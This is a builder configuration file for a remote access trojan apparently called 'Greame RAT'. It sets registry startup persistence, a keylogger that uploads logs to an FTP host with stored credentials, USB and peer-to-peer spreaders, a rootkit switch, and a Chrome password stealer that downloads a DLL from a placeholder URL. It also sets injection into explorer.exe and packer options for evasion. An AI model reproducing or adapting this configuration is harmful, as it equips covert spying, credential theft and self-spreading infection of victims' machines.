[settings]
DNS0=127.0.0.1|999
DNS1=
DNS2=
DNS3=
DNS4=
DNS5=
DNS6=
DNS7=
DNS8=
DNS9=
DNS10=
DNS11=
DNS12=
DNS13=
DNS14=
DNS15=
DNS16=
DNS17=
DNS18=
DNS19=
Server_Name=Server_Fire
Server_Password=123456
Show_Pass=0
Install_Server=0
Local_Install=4|c:\Shah\Gry\
Chaimae0={MB3JKSW-Y883-WE0K-IY6U-SL6N6I178}
Chaimae1=hklm
Chaimae2=hkcm
Chaimae3=Policies
activexstartup=1
policiesstartup=1
hklm=0
hkcu=0
Hide_File=0
Persistance=0
Change_Creation_Date=0
Melt_File=0
mutexname=XxXx
Directory=Large
File_Name=server.exe
Fike_Msg=0
iconemsg=0
btnmsg=0
Message_Fike0=Greame RAT
Message_Fike1=Greame Remote Admin Tool[ENTER]Install Settings[ENTER]Keylogger[ENTER][ENTER]Install Settings[ENTER]Keylogger[ENTER]
keylogger0=0
keylogger1=1
keylogger2=0
keyloggerstrings0=ftp.server.com
keyloggerstrings1=logs/
keyloggerstrings2=ftp_user
keyloggerstrings3=gfhtrZy/k8G/s4q/L4LaQNG
keyloggerstrings4=21
keyloggertimer=5
p2pnames=server.exe#ZIP.exe#
usbspreader=0
p2pspreader=0
rootkiton=0
chromepass=0
chromepasslink=http://www.server.com/XXXX.dll
injectprs=0
Change_Date=0
UPX=1
MPRESS=1
server_Pass=123456
injectprsname=explorer.exe
Fix_Debug=1
